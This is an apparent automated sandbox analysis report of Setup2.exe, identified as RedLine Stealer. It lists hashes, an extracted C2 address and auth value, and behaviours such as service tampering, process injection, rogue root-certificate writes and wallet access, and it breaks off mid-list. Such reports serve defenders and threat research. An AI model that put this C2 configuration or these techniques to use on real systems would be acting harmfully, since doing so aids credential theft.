Analysis
-
max time kernel
151s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
30-08-2022 13:40
Static task
static1
Behavioral task
behavioral1
Sample
Setup2.exe
Resource
win7-20220812-en
General
-
Target
Setup2.exe
-
Size
4.5MB
-
MD5
7ede5e1864c423c59a1cb3bdcd7cc939
-
SHA1
f34f722ed04615441656ccef087e7b982ae09af9
-
SHA256
4754c64162263a12327a42ebcd023e7d0aaae400d02915c1c0ea972ce994842d
-
SHA512
47350800da01d48c6c5ae1a7132bb3f9ed1a247fefbd153b4ec890fd1946a5812ae901f18b775dcc30deeb61e712f42436fcee1ba642ed1b8086517b81c9c95b
-
SSDEEP
98304:dN1vJXa7MqmTWoYNag+r2UFKl2PjXvp0rcqh2MqnPs17EwoIsuimtRc:dLJXa7WTZrjPjxCh8M7VoJuicRc
Malware Config
Extracted
redline
185.200.191.18:80
-
auth_value
a11ae941038a2a4398d552996dbd03f1
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/168328-245-0x000000000041A7DE-mapping.dmp family_redline behavioral1/memory/168328-253-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 1000 created 416 1000 powershell.EXE winlogon.exe PID 932 created 416 932 powershell.EXE winlogon.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
Setup2.exeupdater.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts Setup2.exe File opened for modification C:\Windows\system32\drivers\etc\hosts updater.exe -
Executes dropped EXE 3 IoCs
Processes:
temp.exeupdater.execmd.exepid process 1792 temp.exe 568 updater.exe 1280 cmd.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exepid process 824 icacls.exe 168832 takeown.exe 168888 icacls.exe 452 takeown.exe -
Stops running service(s) 3 TTPs
-
Loads dropped DLL 4 IoCs
Processes:
taskeng.exeWerFault.exepid process 324 taskeng.exe 168408 WerFault.exe 168408 WerFault.exe 168408 WerFault.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 168832 takeown.exe 168888 icacls.exe 452 takeown.exe 824 icacls.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 3 ip-api.com -
Drops file in System32 directory 6 IoCs
Processes:
powershell.exesvchost.exepowershell.exepowershell.exepowershell.EXEpowershell.EXEdescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx svchost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Suspicious use of SetThreadContext 4 IoCs
Processes:
Setup2.exepowershell.EXEcmd.exepowershell.EXEdescription pid process target process PID 1896 set thread context of 972 1896 Setup2.exe conhost.exe PID 1000 set thread context of 1588 1000 powershell.EXE dllhost.exe PID 1280 set thread context of 168328 1280 cmd.exe AppLaunch.exe PID 932 set thread context of 168460 932 powershell.EXE dllhost.exe -
Drops file in Program Files directory 3 IoCs
Processes:
Setup2.exeupdater.exedescription ioc process File created C:\Program Files\Google\Chrome\updater.exe Setup2.exe File opened for modification C:\Program Files\Google\Chrome\updater.exe Setup2.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe -
Drops file in Windows directory 6 IoCs
Processes:
svchost.execonhost.exedescription ioc process File opened for modification C:\Windows\Tasks\dialersvc32.job svchost.exe File created C:\Windows\Tasks\dialersvc32.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc32.job conhost.exe File created C:\Windows\Tasks\dialersvc64.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc64.job conhost.exe File opened for modification C:\Windows\appcompat\programs\RecentFileCache.bcf svchost.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 336 sc.exe 1924 sc.exe 112 sc.exe 168564 sc.exe 1920 sc.exe 532 sc.exe 1556 sc.exe 168400 sc.exe 168748 sc.exe 168836 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 168408 1280 WerFault.exe cmd.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 48 IoCs
Processes:
svchost.exepowershell.EXEupdater.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" updater.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\2d\52C64B7E svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 00645bd786bcd801 powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" updater.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ updater.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\My svchost.exe -
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 1280 reg.exe 1660 reg.exe 1488 reg.exe 1768 reg.exe 1924 reg.exe 584 reg.exe 168588 reg.exe 168496 reg.exe 1912 reg.exe 168476 reg.exe 168632 reg.exe 984 reg.exe 1388 reg.exe 1260 reg.exe 168348 reg.exe 168676 reg.exe 168900 reg.exe 1816 reg.exe -
Processes:
temp.exeSetup2.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 temp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 Setup2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde Setup2.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 temp.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 temp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 temp.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exeSetup2.exepowershell.EXEdllhost.exepowershell.EXEpowershell.exedllhost.exepid process 1176 powershell.exe 1768 powershell.exe 1768 powershell.exe 1896 Setup2.exe 1768 powershell.exe 1000 powershell.EXE 1000 powershell.EXE 1588 dllhost.exe 1588 dllhost.exe 1588 dllhost.exe 1588 dllhost.exe 932 powershell.EXE 932 powershell.EXE 1628 powershell.exe 168460 dllhost.exe 168460 dllhost.exe 168460 dllhost.exe 168460 dllhost.exe 168460 dllhost.exe 168460 dllhost.exe 168460 dllhost.exe 168460 dllhost.exe 168460 dllhost.exe 168460 dllhost.exe 1588 dllhost.exe 1588 dllhost.exe 168460 dllhost.exe 168460 dllhost.exe 1588 dllhost.exe 1588 dllhost.exe 168460 dllhost.exe 168460 dllhost.exe 1588 dllhost.exe 1588 dllhost.exe 168460 dllhost.exe 168460 dllhost.exe 1588 dllhost.exe 1588 dllhost.exe 168460 dllhost.exe 168460 dllhost.exe 1588 dllhost.exe 1588 dllhost.exe 168460 dllhost.exe 168460 dllhost.exe 1588 dllhost.exe 1588 dllhost.exe 168460 dllhost.exe 168460 dllhost.exe 1588 dllhost.exe 1588 dllhost.exe 168460 dllhost.exe 168460 dllhost.exe 1588 dllhost.exe 1588 dllhost.exe 168460 dllhost.exe 168460 dllhost.exe 1588 dllhost.exe 1588 dllhost.exe 168460 dllhost.exe 168460 dllhost.exe 1588 dllhost.exe 1588 dllhost.exe 168460 dllhost.exe 168460 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exeSetup2.exepowershell.exetemp.exepowershell.EXEdllhost.exesvchost.exepowershell.EXEpowershell.exedllhost.exeAppLaunch.exeupdater.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 1176 powershell.exe Token: SeShutdownPrivilege 1020 powercfg.exe Token: SeShutdownPrivilege 1072 powercfg.exe Token: SeShutdownPrivilege 1068 powercfg.exe Token: SeShutdownPrivilege 856 powercfg.exe Token: SeTakeOwnershipPrivilege 452 takeown.exe Token: SeDebugPrivilege 1896 Setup2.exe Token: SeDebugPrivilege 1768 powershell.exe Token: SeDebugPrivilege 1792 temp.exe Token: SeDebugPrivilege 1000 powershell.EXE Token: SeDebugPrivilege 1000 powershell.EXE Token: SeDebugPrivilege 1588 dllhost.exe Token: SeAuditPrivilege 872 svchost.exe Token: SeDebugPrivilege 932 powershell.EXE Token: SeDebugPrivilege 932 powershell.EXE Token: SeDebugPrivilege 1628 powershell.exe Token: SeDebugPrivilege 168460 dllhost.exe Token: SeDebugPrivilege 168328 AppLaunch.exe Token: SeDebugPrivilege 568 updater.exe Token: SeShutdownPrivilege 168544 powercfg.exe Token: SeShutdownPrivilege 168576 powercfg.exe Token: SeShutdownPrivilege 168428 powercfg.exe Token: SeAssignPrimaryTokenPrivilege 872 svchost.exe Token: SeIncreaseQuotaPrivilege 872 svchost.exe Token: SeSecurityPrivilege 872 svchost.exe Token: SeTakeOwnershipPrivilege 872 svchost.exe Token: SeLoadDriverPrivilege 872 svchost.exe Token: SeSystemtimePrivilege 872 svchost.exe Token: SeBackupPrivilege 872 svchost.exe Token: SeRestorePrivilege 872 svchost.exe Token: SeShutdownPrivilege 872 svchost.exe Token: SeSystemEnvironmentPrivilege 872 svchost.exe Token: SeUndockPrivilege 872 svchost.exe Token: SeManageVolumePrivilege 872 svchost.exe Token: SeAssignPrimaryTokenPrivilege 872 svchost.exe Token: SeIncreaseQuotaPrivilege 872 svchost.exe Token: SeSecurityPrivilege 872 svchost.exe Token: SeTakeOwnershipPrivilege 872 svchost.exe Token: SeLoadDriverPrivilege 872 svchost.exe Token: SeSystemtimePrivilege 872 svchost.exe Token: SeBackupPrivilege 872 svchost.exe Token: SeRestorePrivilege 872 svchost.exe Token: SeShutdownPrivilege 872 svchost.exe Token: SeSystemEnvironmentPrivilege 872 svchost.exe Token: SeUndockPrivilege 872 svchost.exe Token: SeManageVolumePrivilege 872 svchost.exe Token: SeAssignPrimaryTokenPrivilege 872 svchost.exe Token: SeIncreaseQuotaPrivilege 872 svchost.exe Token: SeSecurityPrivilege 872 svchost.exe Token: SeTakeOwnershipPrivilege 872 svchost.exe Token: SeLoadDriverPrivilege 872 svchost.exe Token: SeSystemtimePrivilege 872 svchost.exe Token: SeBackupPrivilege 872 svchost.exe Token: SeRestorePrivilege 872 svchost.exe Token: SeShutdownPrivilege 872 svchost.exe Token: SeSystemEnvironmentPrivilege 872 svchost.exe Token: SeUndockPrivilege 872 svchost.exe Token: SeManageVolumePrivilege 872 svchost.exe Token: SeAssignPrimaryTokenPrivilege 872 svchost.exe Token: SeIncreaseQuotaPrivilege 872 svchost.exe Token: SeSecurityPrivilege 872 svchost.exe Token: SeTakeOwnershipPrivilege 872 svchost.exe Token: SeLoadDriverPrivilege 872 svchost.exe Token: SeSystemtimePrivilege 872 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Setup2.execmd.execmd.exedescription pid process target process PID 1896 wrote to memory of 1176 1896 Setup2.exe powershell.exe PID 1896 wrote to memory of 1176 1896 Setup2.exe powershell.exe PID 1896 wrote to memory of 1176 1896 Setup2.exe powershell.exe PID 1896 wrote to memory of 764 1896 Setup2.exe cmd.exe PID 1896 wrote to memory of 764 1896 Setup2.exe cmd.exe PID 1896 wrote to memory of 764 1896 Setup2.exe cmd.exe PID 1896 wrote to memory of 268 1896 Setup2.exe cmd.exe PID 1896 wrote to memory of 268 1896 Setup2.exe cmd.exe PID 1896 wrote to memory of 268 1896 Setup2.exe cmd.exe PID 764 wrote to memory of 336 764 cmd.exe sc.exe PID 764 wrote to memory of 336 764 cmd.exe sc.exe PID 764 wrote to memory of 336 764 cmd.exe sc.exe PID 764 wrote to memory of 532 764 cmd.exe sc.exe PID 764 wrote to memory of 532 764 cmd.exe sc.exe PID 764 wrote to memory of 532 764 cmd.exe sc.exe PID 268 wrote to memory of 1020 268 cmd.exe powercfg.exe PID 268 wrote to memory of 1020 268 cmd.exe powercfg.exe PID 268 wrote to memory of 1020 268 cmd.exe powercfg.exe PID 764 wrote to memory of 1924 764 cmd.exe sc.exe PID 764 wrote to memory of 1924 764 cmd.exe sc.exe PID 764 wrote to memory of 1924 764 cmd.exe sc.exe PID 764 wrote to memory of 112 764 cmd.exe sc.exe PID 764 wrote to memory of 112 764 cmd.exe sc.exe PID 764 wrote to memory of 112 764 cmd.exe sc.exe PID 764 wrote to memory of 1556 764 cmd.exe sc.exe PID 764 wrote to memory of 1556 764 cmd.exe sc.exe PID 764 wrote to memory of 1556 764 cmd.exe sc.exe PID 764 wrote to memory of 1816 764 cmd.exe reg.exe PID 764 wrote to memory of 1816 764 cmd.exe reg.exe PID 764 wrote to memory of 1816 764 cmd.exe reg.exe PID 268 wrote to memory of 1072 268 cmd.exe powercfg.exe PID 268 wrote to memory of 1072 268 cmd.exe powercfg.exe PID 268 wrote to memory of 1072 268 cmd.exe powercfg.exe PID 764 wrote to memory of 1912 764 cmd.exe reg.exe PID 764 wrote to memory of 1912 764 cmd.exe reg.exe PID 764 wrote to memory of 1912 764 cmd.exe reg.exe PID 764 wrote to memory of 1388 764 cmd.exe reg.exe PID 764 wrote to memory of 1388 764 cmd.exe reg.exe PID 764 wrote to memory of 1388 764 cmd.exe reg.exe PID 268 wrote to memory of 1068 268 cmd.exe powercfg.exe PID 268 wrote to memory of 1068 268 cmd.exe powercfg.exe PID 268 wrote to memory of 1068 268 cmd.exe powercfg.exe PID 764 wrote to memory of 1260 764 cmd.exe reg.exe PID 764 wrote to memory of 1260 764 cmd.exe reg.exe PID 764 wrote to memory of 1260 764 cmd.exe reg.exe PID 764 wrote to memory of 584 764 cmd.exe reg.exe PID 764 wrote to memory of 584 764 cmd.exe reg.exe PID 764 wrote to memory of 584 764 cmd.exe reg.exe PID 268 wrote to memory of 